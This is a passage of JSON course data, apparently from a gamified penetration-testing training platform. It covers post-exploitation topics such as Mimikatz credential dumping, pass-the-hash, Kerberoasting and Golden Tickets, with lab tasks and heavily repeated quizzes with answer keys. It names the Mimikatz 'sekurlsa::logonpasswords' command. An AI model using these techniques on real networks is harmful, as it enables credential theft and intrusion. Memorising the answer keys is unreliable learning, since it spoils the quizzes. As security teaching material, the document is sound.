blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-file-xfer","cat":"Post-Exploitation","title":"File Transfer Methods","diff":1,"xp":75,"intro":"Move files to/from the target.","sections":[{"type":"text","content":"Move files to/from the target."},{"type":"code","lang":"bash","content":"HTTP, SMB, SCP, base64, certutil \u2014 multiple transfer methods"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Which is a Windows LOLBin for downloads?","opts":["curl","wget","certutil","scp"],"ans":2},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-enum-win","cat":"Post-Exploitation","title":"Windows Enumeration Checklist","diff":1,"xp":75,"intro":"Systematic Windows post-exploitation.","sections":[{"type":"text","content":"Systematic Windows post-exploitation."},{"type":"code","lang":"bash","content":"whoami, systeminfo, net user, netstat, tasklist, installed software"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"First command on Windows?","opts":["dir","whoami /all","cls","ipconfig"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-enum-linux","cat":"Post-Exploitation","title":"Linux Enumeration Checklist","diff":1,"xp":75,"intro":"Systematic Linux post-exploitation.","sections":[{"type":"text","content":"Systematic Linux post-exploitation."},{"type":"code","lang":"bash","content":"id, uname, sudo -l, SUID binaries, cron jobs, writable files"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why run sudo -l?","opts":["See all users","Check sudo privileges","View logs","Change password"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-mimikatz","cat":"Post-Exploitation","title":"Mimikatz Credential Dump","diff":2,"xp":150,"intro":"Extract credentials from Windows memory.","sections":[{"type":"text","content":"Extract credentials from Windows memory."},{"type":"code","lang":"bash","content":"sekurlsa::logonpasswords dumps cleartext and hashes from LSASS"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Mimikatz reads from which process?","opts":["csrss.exe","lsass.exe","svchost.exe","explorer.exe"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-pth","cat":"Post-Exploitation","title":"Pass the Hash","diff":2,"xp":150,"intro":"Authenticate with NTLM hash without cracking.","sections":[{"type":"text","content":"Authenticate with NTLM hash without cracking."},{"type":"code","lang":"bash","content":"Windows NTLM accepts the hash directly for authentication"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"PTH works because NTLM...","opts":["Encrypts everything","Uses the hash directly for auth","Requires cleartext","Uses Kerberos"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-kerberoast","cat":"Post-Exploitation","title":"Kerberoasting","diff":2,"xp":150,"intro":"Crack service account passwords offline.","sections":[{"type":"text","content":"Crack service account passwords offline."},{"type":"code","lang":"bash","content":"Request TGS tickets and crack them \u2014 encrypted with service password"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Kerberoasting targets...","opts":["All users","Service accounts with SPNs","Computers","Domain controllers"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-asrep","cat":"Post-Exploitation","title":"AS-REP Roasting","diff":2,"xp":150,"intro":"Attack accounts without pre-auth.","sections":[{"type":"text","content":"Attack accounts without pre-auth."},{"type":"code","lang":"bash","content":"Accounts with pre-auth disabled leak crackable AS-REP hashes"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"AS-REP targets accounts with...","opts":["Strong passwords","Pre-authentication disabled","Admin privileges","Expired passwords"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-golden-ticket","cat":"Post-Exploitation","title":"Golden Ticket","diff":3,"xp":200,"intro":"Forge any Kerberos identity with krbtgt hash.","sections":[{"type":"text","content":"Forge any Kerberos identity with krbtgt hash."},{"type":"code","lang":"bash","content":"With krbtgt hash, create TGTs for any user including non-existent ones"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Golden ticket requires...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and 